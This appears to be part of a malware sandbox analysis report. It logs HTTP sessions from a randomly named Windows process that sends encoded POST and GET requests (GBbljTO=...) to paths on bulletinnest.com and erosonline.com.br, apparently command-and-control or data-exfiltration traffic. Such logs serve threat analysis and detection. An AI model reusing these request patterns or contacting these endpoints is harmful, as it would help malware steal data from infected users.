                                                          Jul 2, 2024 14:05:24.248266935 CEST | 1236 | IN | Data Raw: 63 6f 6d 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 35 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d
                                                          Data Ascii: com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.5"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e
                                                          Jul 2, 2024 14:05:24.248294115 CEST | 1236 | IN | Data Raw: 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c 79 3a 21 30 7d 29 2c 6f 3d 28 61 2e 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22
                                                          Data Ascii: Element("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChi
                                                          Jul 2, 2024 14:05:24.248307943 CEST | 896 | IN | Data Raw: 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 3d 3d 74 26 26 28 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e
                                                          Data Ascii: .everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.rea
                                                          Jul 2, 2024 14:05:24.248651981 CEST | 1236 | IN | Data Raw: 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 6c 69 62 72 61 72 79 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 62 75 6c 6c 65 74 69 6e 6e 65 73 74 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 63 73 73 2f 64 69 73 74 2f 62 6c 6f 63 6b 2d
                                                          Data Ascii: d='wp-block-library-css' href='http://bulletinnest.com/wp-includes/css/dist/block-library/style.min.css?ver=6.5.5' media='all' /><style id='wp-block-library-theme-inline-css'>.wp-block-audio figcaption{color:#555;font-size:13px;text-align:ce
                                                          Jul 2, 2024 14:05:24.248727083 CEST | 224 | IN | Data Raw: 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d
                                                          Data Ascii: m}.wp-block-quote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-rig
                                                          Jul 2, 2024 14:05:24.248884916 CEST | 1236 | IN | Data Raw: 68 74 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 63 65 6e 74 65 72 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 7d 2e 77 70 2d 62 6c 6f 63 6b 2d
                                                          Data Ascii: ht:1em}.wp-block-quote.has-text-align-center{border:none;padding-left:0}.wp-block-quote.is-large,.wp-block-quote.is-style-large,.wp-block-quote.is-style-plain{border:none}.wp-block-search .wp-block-search__label{font-weight:700}.wp-block-searc
                                                          Jul 2, 2024 14:05:24.248893976 CEST | 224 | IN | Data Raw: 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 70 61 64 64 69 6e 67 3a 31 2e 32 35 65 6d 20 32 2e 33 37 35 65 6d 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 63 6c 61 73 73 69 63 2d 74 68 65 6d 65 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e
                                                          Data Ascii: argin-top:0;padding:1.25em 2.375em}</style><style id='classic-theme-styles-inline-css'>/*! This file is auto-generated */.wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;tex
                                                          Jul 2, 2024 14:05:24.248987913 CEST | 1236 | IN | Data Raw: 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e 36 36 37 65 6d 20 2b 20 32 70 78 29 20 63 61 6c 63 28 31 2e 33 33 33 65 6d 20 2b 20 32 70 78 29 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 32 35 65 6d
                                                          Data Ascii: t-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-inline-css'>body{--wp--preset--color--black: #0000
                                                          Jul 2, 2024 14:05:24.253231049 CEST | 1236 | IN | Data Raw: 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 74 6f 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 3a 20 6c 69 6e 65
                                                          Data Ascii: 207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,12


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          39 | 192.168.2.6 | 49762 | 135.181.212.206 | 80 | 280 | C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 2, 2024 14:05:25.763303995 CEST | 1795 | OUT | POST /r7gq/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 1248
                                                          Host: www.bulletinnest.com
                                                          Origin: http://www.bulletinnest.com
                                                          Referer: http://www.bulletinnest.com/r7gq/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 45 37 77 33 42 62 38 6d 42 6e 61 6a 49 42 57 6a 77 5a 74 4d 55 4f 45 32 67 77 74 6c 49 2f 6b 78 64 34 6d 53 6e 38 63 71 4c 77 53 34 47 50 36 6b 48 75 30 6f 30 38 2f 75 41 42 6c 33 6a 32 72 44 4e 32 6b 61 6f 30 70 4c 4d 67 71 67 67 42 7a 62 70 57 37 4b 75 45 76 54 6f 4c 67 47 4c 42 44 39 61 38 4d 56 67 42 78 54 37 6f 65 79 51 63 68 41 70 6e 4e 4d 75 38 32 79 76 4d 6e 49 7a 6e 42 4c 32 6b 2b 64 32 6f 57 45 71 4a 6b 6f 51 4b 68 61 79 55 47 79 35 72 58 38 73 4c 5a 38 50 33 4e 63 72 42 6e 72 65 77 72 76 6c 6a 38 37 7a 73 30 62 77 69 41 75 41 43 73 6b 6f 4f 74 2f 31 69 52 44 64 33 46 43 33 43 39 30 68 35 39 73 63 52 77 75 41 4e 6d 57 56 33 4f 61 55 4b 58 65 56 47 66 57 67 47 33 4a 6a 4b 62 33 35 4f 45 6f 36 53 65 4d 78 36 41 6c 69 4f 72 62 4b 42 34 52 74 6c 32 56 4b 31 38 49 2f 6d 77 75 43 6c 34 4a 4e 4f 78 75 69 5a 43 47 49 4f 63 75 33 42 66 73 32 65 4b 2b 51 2f 46 33 42 4c 4d 38 72 5a 47 41 4a 4f 6f 2b 72 43 6b 41 59 36 62 44 35 2f 6a 4f 6c 57 32 6b 66 61 63 59 78 71 76 38 6e 66 [TRUNCATED]
                                                          Data Ascii: GBbljTO=E7w3Bb8mBnajIBWjwZtMUOE2gwtlI/kxd4mSn8cqLwS4GP6kHu0o08/uABl3j2rDN2kao0pLMgqggBzbpW7KuEvToLgGLBD9a8MVgBxT7oeyQchApnNMu82yvMnIznBL2k+d2oWEqJkoQKhayUGy5rX8sLZ8P3NcrBnrewrvlj87zs0bwiAuACskoOt/1iRDd3FC3C90h59scRwuANmWV3OaUKXeVGfWgG3JjKb35OEo6SeMx6AliOrbKB4Rtl2VK18I/mwuCl4JNOxuiZCGIOcu3Bfs2eK+Q/F3BLM8rZGAJOo+rCkAY6bD5/jOlW2kfacYxqv8nfvB9GRk8FDNIkHIBbBS/DXi2U6Mqk02674jl912G7UGoCjYX0cigSDzpueV4ZpZMZo1yRszYptoy1wjFluzpFxubTTxgAAafhPD8PpQ9AgmDeOh6NGL391WwcsGBc06IBSK4dcXvyAxGPjH9LrAvwbbAvp0ko8rpHdsbY/awAbJevWknAcrzbRd0Qc37JIu5zgp7uPlcHKnUU7SteyNesJm9T0NzR7iY3UXBj4V5c6kP5HQhoXIh1hCdIKqLduncHa8jM87eysxIyghD7fhY88u7uXkBMMmWBRfIkP3NTU8BfKPaJvLOHer6B9O/sDIi5H4LyiUfNxTrwc+RPKLTAJVZqawdhBtwqbW0nw0GyQrZaBInpfbeWcfyqdZkGLBZPW/rjaTmCR3wml+fSd9NPEcveOrfUaxhfVk69ItcLJtpIk+AEe/radnA2667plHNQu5yeFYZsP3fjqKs9HK2+Mv+4jvAlpoWWXgRC865TNOXy+pKmrOjz0f3/QmVr7IsgRqLUGPDNGDOnJEwfEqfDPvUQi2xjXvonM6pxMDJ35OX/CeXaT95rBogUXo3eSgeh8k9Xg4i0KkaaHzZE4cJjHv62yWg94UtToVj6dNkI5uRY6cHJ+8CgpwYu5VHFXthiLzNaVjMLjC7OIGspi2ENJ1gbNABh/3J9XU [TRUNCATED]
                                                          Jul 2, 2024 14:05:26.733534098 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Date: Tue, 02 Jul 2024 12:05:26 GMT
                                                          Server: Apache
                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                          Link: <https://bulletinnest.com/index.php/wp-json/>; rel="https://api.w.org/"
                                                          Connection: close
                                                          Transfer-Encoding: chunked
                                                          Content-Type: text/html; charset=UTF-8
                                                          Data Raw: 31 66 30 62 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 32 2e 36 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f [TRUNCATED]
                                                          Data Ascii: 1f0b<!doctype html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v22.6 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found -</title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found -" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://bulletinnest.com/#website","url":"https://bulletinnest.com/","name":"bulletinnest","description":"","publisher":{"@id":"https://bulletinnest.com/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://
                                                          Jul 2, 2024 14:05:26.733551025 CEST | 1236 | IN | Data Raw: 62 75 6c 6c 65 74 69 6e 6e 65 73 74 2e 63 6f 6d 2f 3f 73 3d 7b 73 65 61 72 63 68 5f 74 65 72 6d 5f 73 74 72 69 6e 67 7d 22 7d 2c 22 71 75 65 72 79 2d 69 6e 70 75 74 22 3a 22 72 65 71 75 69 72 65 64 20 6e 61 6d 65 3d 73 65 61 72 63 68 5f 74 65 72
                                                          Data Ascii: bulletinnest.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https://bulletinnest.com/#organization","name":"bulletinnest","url":"https://bulletinnest.com/",
                                                          Jul 2, 2024 14:05:26.733562946 CEST | 1236 | IN | Data Raw: 63 6f 6d 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 35 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d
                                                          Data Ascii: com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.5"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e
                                                          Jul 2, 2024 14:05:26.733653069 CEST | 1236 | IN | Data Raw: 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c 79 3a 21 30 7d 29 2c 6f 3d 28 61 2e 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22
                                                          Data Ascii: Element("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChi
                                                          Jul 2, 2024 14:05:26.733665943 CEST | 1236 | IN | Data Raw: 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 3d 3d 74 26 26 28 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e
                                                          Data Ascii: .everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.rea
                                                          Jul 2, 2024 14:05:26.733676910 CEST | 1236 | IN | Data Raw: 2d 62 6c 6f 63 6b 2d 63 6f 64 65 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4d 65 6e 6c 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 6d 6f 6e
                                                          Data Ascii: -block-code{border:1px solid #ccc;border-radius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}.wp-block-embed figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed figcaption{color:#ffffffa6}.
                                                          Jul 2, 2024 14:05:26.733689070 CEST | 1236 | IN | Data Raw: 73 74 79 6c 65 2d 6c 61 72 67 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 69 73 2d 73 74 79 6c 65 2d 70 6c 61 69 6e 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 20 2e 77 70 2d 62 6c 6f 63 6b 2d
                                                          Data Ascii: style-large,.wp-block-quote.is-style-plain{border:none}.wp-block-search .wp-block-search__label{font-weight:700}.wp-block-search__button{border:1px solid #ccc;padding:.375em .625em}:where(.wp-block-group.has-background){padding:1.25em 2.375em}
                                                          Jul 2, 2024 14:05:26.733774900 CEST | 108 | IN | Data Raw: 72 61 74 65 64 20 2a 2f 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a
                                                          Data Ascii: rated */.wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;tex
                                                          Jul 2, 2024 14:05:26.733836889 CEST | 1236 | IN | Data Raw: 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e 36 36 37 65 6d 20 2b 20 32 70 78 29 20 63 61 6c 63 28 31 2e 33 33 33 65 6d 20 2b 20 32 70 78 29 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 32 35 65 6d
                                                          Data Ascii: t-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-inline-css'>body{--wp--preset--color--black: #0000
                                                          Jul 2, 2024 14:05:26.733848095 CEST | 1236 | IN | Data Raw: 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 74 6f 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 3a 20 6c 69 6e 65
                                                          Data Ascii: 207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,12
                                                          Jul 2, 2024 14:05:26.738569975 CEST | 1236 | IN | Data Raw: 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 68 75 67 65 3a 20 34 38 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d
                                                          Data Ascii: 36px;--wp--preset--font-size--huge: 48px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.3


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          40 | 192.168.2.6 | 49763 | 135.181.212.206 | 80 | 280 | C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 2, 2024 14:05:28.296564102 CEST | 486 | OUT | GET /r7gq/?GBbljTO=J5YXCuAbT0imQyqe16hzUfFFlDgtP40GBYCO3M0UAxiKR6OMc8IU/OmfKBQVi2nAD0slqU03Fjqs2wbSr2/73QjcpJUwGjWcGd039QJH+viAIsBs41Zzvp+05pTyuEBiwTKkz9s=&mB=rL4lP HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.bulletinnest.com
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Jul 2, 2024 14:05:29.317720890 CEST | 479 | IN | HTTP/1.1 301 Moved Permanently
                                                          Date: Tue, 02 Jul 2024 12:05:28 GMT
                                                          Server: Apache
                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                          X-Redirect-By: WordPress
                                                          Location: http://bulletinnest.com/r7gq/?GBbljTO=J5YXCuAbT0imQyqe16hzUfFFlDgtP40GBYCO3M0UAxiKR6OMc8IU/OmfKBQVi2nAD0slqU03Fjqs2wbSr2/73QjcpJUwGjWcGd039QJH+viAIsBs41Zzvp+05pTyuEBiwTKkz9s=&mB=rL4lP
                                                          Content-Length: 0
                                                          Connection: close
                                                          Content-Type: text/html; charset=UTF-8


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          41 | 192.168.2.6 | 49764 | 191.6.208.133 | 80 | 280 | C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 2, 2024 14:05:35.166114092 CEST | 761 | OUT | POST /2lcx/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 212
                                                          Host: www.erosonline.com.br
                                                          Origin: http://www.erosonline.com.br
                                                          Referer: http://www.erosonline.com.br/2lcx/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 58 32 34 2f 48 75 62 6f 52 4f 58 52 36 68 47 58 4f 6e 2f 48 43 38 37 46 4c 44 31 66 46 31 75 35 77 74 4f 30 7a 69 68 4a 77 6d 36 36 66 51 75 53 32 76 59 39 2f 6f 52 34 6a 2b 4b 64 74 71 61 43 51 5a 51 39 63 39 59 2f 6f 41 63 32 4e 68 74 77 75 35 32 39 62 78 39 59 44 4e 73 59 4a 63 33 6d 56 38 2b 42 6c 51 37 49 46 6b 39 41 37 61 77 73 65 58 36 39 5a 7a 5a 43 36 52 34 37 76 76 51 53 2f 58 77 34 4d 34 38 46 71 55 56 61 39 44 36 46 32 6c 76 42 55 4e 53 37 79 52 2f 41 58 75 49 41 5a 6f 58 51 52 58 6c 48 42 61 4b 2f 34 66 41 42 6b 5a 64 65 4e 66 6c 4e 6c 30 2b 57 35 42 53 45 31 50 49 6f 50 58 76 31 68 42 57 51
                                                          Data Ascii: GBbljTO=X24/HuboROXR6hGXOn/HC87FLD1fF1u5wtO0zihJwm66fQuS2vY9/oR4j+KdtqaCQZQ9c9Y/oAc2Nhtwu529bx9YDNsYJc3mV8+BlQ7IFk9A7awseX69ZzZC6R47vvQS/Xw4M48FqUVa9D6F2lvBUNS7yR/AXuIAZoXQRXlHBaK/4fABkZdeNflNl0+W5BSE1PIoPXv1hBWQ
                                                          Jul 2, 2024 14:05:35.864717007 CEST | 727 | IN | HTTP/1.1 404 Not Found
                                                          Date: Tue, 02 Jul 2024 12:05:35 GMT
                                                          Server: Apache
                                                          Last-Modified: Thu, 24 Oct 2019 19:33:13 GMT
                                                          ETag: "1e8-595ad1aad5040"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 488
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 70 74 2d 62 72 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 50 e1 67 69 6e 61 20 4e e3 6f 20 45 6e 63 6f 6e 74 72 61 64 61 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 62 3e 3c 66 6f 6e 74 [TRUNCATED]
                                                          Data Ascii: <html><head><meta http-equiv="Content-Language" content="pt-br"><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>Página Não Encontrada</title></head><body><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center"><b><font face="Arial" size="3">Erro 404</font></b></p><p align="center"><font face="MS Sans Serif" size="2">Página não encontrada</font></p></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          42 | 192.168.2.6 | 49766 | 191.6.208.133 | 80 | 280 | C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 2, 2024 14:05:37.704380035 CEST | 785 | OUT | POST /2lcx/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 236
                                                          Host: www.erosonline.com.br
                                                          Origin: http://www.erosonline.com.br
                                                          Referer: http://www.erosonline.com.br/2lcx/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
